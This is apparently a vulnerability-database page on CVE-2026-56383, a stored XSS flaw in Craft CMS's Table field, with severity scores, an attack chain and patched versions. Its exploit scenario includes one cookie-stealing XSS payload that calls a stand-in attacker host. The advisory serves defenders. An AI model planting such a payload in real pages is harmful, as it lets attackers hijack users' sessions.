Skip to main content

Craft CMS CVE-2026-56383

| EUVDEUVD-2026-38177 MEDIUM
Cross-site Scripting (XSS) (CWE-79)
2026-06-21 VulnCheck GHSA-5w9j-w5p8-r4p7
4.6
CVSS 4.0 · Vendor: VulnCheck
Share

Severity by source

Vendor (VulnCheck) PRIMARY
4.6 MEDIUM
CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vuln.today AI
4.8 MEDIUM

Admin-only write access required (PR:H), victim must load the page (UI:R), and injected JavaScript executes in other users' browser contexts causing scope change (S:C).

3.1 AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N
4.0 AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N

Primary rating from Vendor (VulnCheck).

CVSS VectorVendor: VulnCheck

CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
High
User Interaction
A
Scope
X

Lifecycle Timeline

2
Source Code Evidence Fetched
Jun 22, 2026 - 06:37 vuln.today
Analysis Generated
Jun 22, 2026 - 06:37 vuln.today

DescriptionCVE.org

Craft CMS contains a stored cross-site scripting (XSS) vulnerability in the editableTable.twig component when using the 'Row Heading' column type. The application fails to sanitize input within row heading default values, allowing an attacker with an administrator account (with allowAdminChanges enabled) to inject arbitrary JavaScript that executes when another user views a page containing the affected table field. Affected versions are >= 4.5.0-beta.1 through 4.16.18 and >= 5.0.0-RC1 through 5.8.22; fixed in 4.16.19 and 5.8.23.

AnalysisAI

Stored XSS in Craft CMS's Table field component allows an authenticated administrator to persist arbitrary JavaScript via the Row Heading column type's default values, executing in the browser of any subsequent user who views a page rendering the affected table field. Affected deployments span Craft CMS 4.5.0-beta.1 through 4.16.18 and 5.0.0-RC1 through 5.8.22; patches are available in 4.16.19 and 5.8.23. …

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Attacker holds or compromises admin account
Delivery
Navigate to Settings
Exploit
Fields and configure Row Heading column type
Install
Inject XSS payload in Default Values with Static Rows enabled
C2
Victim browses page rendering the poisoned table field
Execute
Payload executes in victim's browser context
Impact
Exfiltrate session token or perform actions as victim

Vulnerability AssessmentAI

Exploitation Exploitation requires two specific, documented prerequisites beyond network access. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment The CVSS 4.0 score of 4.6 (Medium) with vector AV:N/AC:L/AT:N/PR:H/UI:A accurately captures the constrained attack surface: the PR:H metric reflects the full administrator account requirement, and UI:A reflects mandatory victim interaction - the victim must navigate to a page rendering the malicious table field. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario A malicious or compromised Craft CMS administrator navigates to Settings → Fields, creates or edits a Table field, adds a Row Heading column type, and enters a JavaScript payload such as `<img src=x onerror="fetch('https://attacker.example/steal?c='+document.cookie)">` in the Default Values section with Static Rows enabled. When a lower-privileged user - such as an editor or site visitor - subsequently views any page or profile that renders the poisoned table field, the injected script executes silently in their browser, enabling session token exfiltration or unauthorized actions on the victim's behalf. …
Remediation Upgrade Craft CMS to version 4.16.19 (for 4.x installations) or 5.8.23 (for 5.x installations); the upstream fix is available at https://github.com/craftcms/cms/commit/7b372de262b8d9d2ce859f32780c3715719b6f5a, with the full advisory at https://github.com/craftcms/cms/security/advisories/GHSA-6j87-m5qx-9fqp. … Detailed patch versions, workarounds, and compensating controls in full report.

Threat intelligence, references, and detailed analysis are available after sign-in.

More in Cms

View all
CVE-2020-7357 CRITICAL POC
9.9 Aug 06

Cayin CMS suffers from an authenticated OS semi-blind command injection vulnerability using default credentials. Rated c

CVE-2012-4405 MEDIUM
6.8 Sep 18

Multiple integer underflows in the icmLut_allocate function in International Color Consortium (ICC) Format library (iccl

CVE-2021-47753 CRITICAL POC
9.8 Jan 15

phpKF CMS 3.00 Beta allows unauthenticated PHP file upload by disguising it as a PNG, then renaming it for execution. Po

CVE-2019-9874 CRITICAL POC
9.8 May 31

Deserialization of Untrusted Data in the Sitecore.Security.AntiCSRF (aka anti CSRF) module in Sitecore CMS 7.0 to 7.2 an

CVE-2019-9875 HIGH POC
8.8 May 31

Deserialization of Untrusted Data in the anti CSRF module in Sitecore through 9.1 allows an authenticated attacker to ex

CVE-2012-5894 HIGH POC
7.5 Nov 17

SQL injection vulnerability in hava_post.php in Havalite CMS 1.1.0 and earlier allows remote attackers to execute arbitr

CVE-2012-5893 MEDIUM POC
6.8 Nov 17

Unrestricted file upload vulnerability in hava_upload.php in Havalite CMS 1.1.0 and earlier allows remote attackers to e

CVE-2015-2083 MEDIUM POC
6.8 Feb 25

Cross-site request forgery (CSRF) vulnerability in Ilch CMS allows remote attackers to hijack the authentication of admi

CVE-2012-5919 MEDIUM POC
4.3 Nov 19

Multiple cross-site scripting (XSS) vulnerabilities in Havalite 1.0.4 and earlier allow remote attackers to inject arbit

CVE-2025-5429 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

CVE-2025-5428 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

CVE-2025-5427 MEDIUM POC
6.3 Jun 02

A security vulnerability in juzaweb CMS (CVSS 6.3). Risk factors: public PoC available.

Share

CVE-2026-56383 vulnerability details – vuln.today

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy